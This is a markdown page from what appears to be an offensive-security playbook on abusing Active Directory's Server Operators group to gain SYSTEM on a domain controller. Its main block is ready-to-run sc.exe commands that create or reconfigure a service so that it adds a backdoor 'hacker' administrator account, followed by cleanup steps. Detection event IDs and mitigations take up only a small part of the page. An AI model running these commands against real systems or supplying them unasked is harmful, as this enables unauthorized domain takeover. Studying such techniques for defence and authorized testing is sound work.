attack-51-abusing-server-operators-group.md (2765B)
1 --- 2 title: "Attack #51 โ Abusing Server Operators Group" 3 description: "sc.exe \\\\DC01 create evilsvc binPath= \"cmd.exe /c net user hacker P@ss123! /add && net localgroup Administrators hacker /add\" start= auto sc.exe \\\\DC01โฆ" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory", "adcs"] 7 tools: ["PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ฃ Attack #51 โ Abusing Server Operators Group.md" 11 --- 12 # ๐ฃ Attack #51 โ Abusing Server Operators Group 13 14 *** 15 16 ## ๐ How It Works 17 18 **Server Operators** can log on to Domain Controllers, start/stop services, manage shared resources, and backup/restore files. The critical escalation path: Server Operators can **modify and create Windows services** โ allowing them to create a malicious service that runs as SYSTEM, achieving SYSTEM-level access on a DC. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Membership in Server Operators** | Can manage services on DCs | 27 28 *** 29 30 ## ๐ป Full Commands 31 32 ```powershell 33 # โโ Create a malicious service โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 34 sc.exe \\DC01 create evilsvc binPath= "cmd.exe /c net user hacker P@ss123! /add && net localgroup Administrators hacker /add" start= auto 35 sc.exe \\DC01 start evilsvc 36 37 # โโ Or modify an existing service โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 38 # Find a stoppable service: 39 sc.exe \\DC01 query type=own | findstr SERVICE_NAME 40 sc.exe \\DC01 config VSS binPath= "cmd.exe /c net localgroup Administrators low_user /add" 41 sc.exe \\DC01 stop VSS 42 sc.exe \\DC01 start VSS 43 44 # โโ Cleanup โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 45 sc.exe \\DC01 delete evilsvc 46 # Or restore the original binPath 47 ``` 48 49 *** 50 51 ## ๐ก๏ธ Detection โ Event IDs 52 53 | Event ID | Source | What to Look For | 54 |---|---|---| 55 | **7045** | System Log (DC) | New service installed with suspicious binPath | 56 | **4697** | Security Log (DC) | Service installation | 57 | **4688** | Security Log (DC) | Process creation from service | 58 59 *** 60 61 ## ๐ Attack Chain Context 62 63 ``` 64 [Server Operators] โโโ Service manipulation โ SYSTEM on DC 65 โ 66 โโโโ ๐ Create/modify service โ run as SYSTEM โ DCSync 67 โโโโ ๐ Defeated by: empty Server Operators group, monitor 7045 68 ``` 69 70 *** 71 72 > โ **Attack #51 โ Server Operators complete.**